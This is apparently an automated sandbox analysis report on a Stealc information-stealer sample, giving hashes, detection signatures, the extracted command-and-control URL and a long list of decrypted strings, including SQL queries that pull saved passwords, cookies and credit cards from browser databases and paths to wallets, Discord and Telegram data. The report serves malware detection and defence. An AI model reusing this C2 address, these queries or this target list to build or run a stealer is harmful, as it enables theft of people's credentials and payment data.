Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
stealcy11.exe

Overview

General Information

Sample name:stealcy11.exe
Analysis ID:1579700
MD5:004431fc72fc1228abf10e298efa0271
SHA1:05195b1a70f078c9116998d7486e672d90e93218
SHA256:082796fccb8ffb566a99ba188cae572eac30f1bf6e11a7bf4e5ebe757bc66c88
Tags:exeStealCuser-lontze7
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • stealcy11.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\stealcy11.exe" MD5: 004431FC72FC1228ABF10E298EFA0271)
    • WerFault.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "https:/135.181.65.216/ee45b7c5e4cb75cb.php"}
SourceRuleDescriptionAuthorStrings
stealcy11.exeJoeSecurity_StealcYara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              0.2.stealcy11.exe.8e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.0.stealcy11.exe.8e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-23T07:58:48.693601+010020287653Unknown Traffic192.168.2.949712135.181.65.216443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: stealcy11.exeAvira: detected
                  Source: stealcy11.exe.7784.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "https:/135.181.65.216/ee45b7c5e4cb75cb.php"}
                  Source: stealcy11.exeReversingLabs: Detection: 60%
                  Source: stealcy11.exeVirustotal: Detection: 56%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: stealcy11.exeJoe Sandbox ML: detected
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: INSERT_KEY_HERE
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 01
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 03
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 20
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 25
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetProcAddress
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: LoadLibraryA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: lstrcatA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: OpenEventA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CreateEventA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CloseHandle
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Sleep
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetUserDefaultLangID
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: VirtualAllocExNuma
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: VirtualFree
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetSystemInfo
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: VirtualAlloc
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HeapAlloc
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetComputerNameA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: lstrcpyA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetProcessHeap
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetCurrentProcess
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: lstrlenA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ExitProcess
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GlobalMemoryStatusEx
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetSystemTime
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SystemTimeToFileTime
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: advapi32.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: gdi32.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: user32.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: crypt32.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetUserNameA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CreateDCA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetDeviceCaps
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ReleaseDC
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CryptStringToBinaryA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sscanf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: VMwareVMware
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HAL9TH
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: JohnDoe
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DISPLAY
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %hu/%hu/%hu
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: https://135.181.65.216
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: /ee45b7c5e4cb75cb.php
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: /4a21a126be249f0d/
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: default
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetEnvironmentVariableA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetFileAttributesA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HeapFree
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetFileSize
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GlobalSize
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CreateToolhelp32Snapshot
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: IsWow64Process
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Process32Next
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetLocalTime
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: FreeLibrary
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetTimeZoneInformation
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetSystemPowerStatus
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetVolumeInformationA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetWindowsDirectoryA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Process32First
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetLocaleInfoA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetUserDefaultLocaleName
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetModuleFileNameA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DeleteFileA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: FindNextFileA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: LocalFree
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: FindClose
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SetEnvironmentVariableA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: LocalAlloc
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetFileSizeEx
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ReadFile
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SetFilePointer
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: WriteFile
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CreateFileA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: FindFirstFileA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CopyFileA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: VirtualProtect
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetLastError
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: lstrcpynA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: MultiByteToWideChar
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GlobalFree
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: WideCharToMultiByte
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GlobalAlloc
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: OpenProcess
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: TerminateProcess
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetCurrentProcessId
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: gdiplus.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ole32.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: bcrypt.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: wininet.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: shlwapi.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: shell32.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: rstrtmgr.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CreateCompatibleBitmap
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SelectObject
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: BitBlt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DeleteObject
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CreateCompatibleDC
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdipGetImageEncodersSize
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdipGetImageEncoders
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdiplusStartup
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdiplusShutdown
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdipSaveImageToStream
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdipDisposeImage
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GdipFree
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetHGlobalFromStream
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CreateStreamOnHGlobal
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CoUninitialize
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CoInitialize
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CoCreateInstance
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: BCryptDecrypt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: BCryptSetProperty
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: BCryptDestroyKey
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetWindowRect
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetDesktopWindow
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetDC
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CloseWindow
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: wsprintfA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: EnumDisplayDevicesA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetKeyboardLayoutList
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CharToOemW
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: wsprintfW
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RegQueryValueExA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RegEnumKeyExA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RegOpenKeyExA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RegCloseKey
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RegEnumValueA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CryptBinaryToStringA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CryptUnprotectData
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SHGetFolderPathA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ShellExecuteExA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: InternetOpenUrlA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: InternetConnectA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: InternetCloseHandle
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HttpSendRequestA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HttpOpenRequestA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: InternetReadFile
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: InternetCrackUrlA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: StrCmpCA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: StrStrA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: StrCmpCW
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: PathMatchSpecA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: GetModuleFileNameExA
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RmStartSession
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RmRegisterResources
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RmGetList
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: RmEndSession
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_open
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_prepare_v2
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_step
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_column_text
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_finalize
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_close
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_column_bytes
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3_column_blob
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: encrypted_key
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: PATH
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: NSS_Init
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: NSS_Shutdown
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: PK11_GetInternalKeySlot
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: PK11_FreeSlot
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: PK11_Authenticate
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: PK11SDR_Decrypt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: C:\ProgramData\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: browser:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: profile:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: url:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: login:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: password:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Opera
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: OperaGX
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Network
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: cookies
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: .txt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: TRUE
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: FALSE
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: autofill
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: history
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: cc
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: name:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: month:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: year:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: card:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Cookies
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Login Data
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Web Data
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: History
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: logins.json
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: formSubmitURL
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: usernameField
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: encryptedUsername
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: encryptedPassword
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: guid
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: cookies.sqlite
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: formhistory.sqlite
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: places.sqlite
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: plugins
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Local Extension Settings
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Sync Extension Settings
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: IndexedDB
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Opera Stable
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Opera GX Stable
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: CURRENT
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: chrome-extension_
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: _0.indexeddb.leveldb
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Local State
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: profiles.ini
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: chrome
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: opera
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: firefox
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: wallets
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %08lX%04lX%lu
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ProductName
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: x32
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: x64
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DisplayName
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DisplayVersion
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Network Info:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - IP: IP?
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Country: ISO?
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: System Summary:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - HWID:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - OS:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Architecture:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - UserName:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Computer Name:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Local Time:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - UTC:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Language:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Keyboards:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Laptop:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Running Path:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - CPU:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Threads:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Cores:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - RAM:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - Display Resolution:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: - GPU:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: User Agents:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Installed Apps:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: All Users:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Current User:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Process List:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: system_info.txt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: freebl3.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: mozglue.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: msvcp140.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: nss3.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: softokn3.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: vcruntime140.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Temp\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: .exe
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: runas
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: open
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: /c start
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %DESKTOP%
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %APPDATA%
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %LOCALAPPDATA%
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %USERPROFILE%
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %DOCUMENTS%
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %PROGRAMFILES_86%
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: %RECENT%
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: *.lnk
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: files
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \discord\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Local Storage\leveldb
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Telegram Desktop\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: key_datas
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: D877F783D5D3EF8C*
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: map*
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: A7FDF864FBC10B77*
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: A92DAA6EA6F891F2*
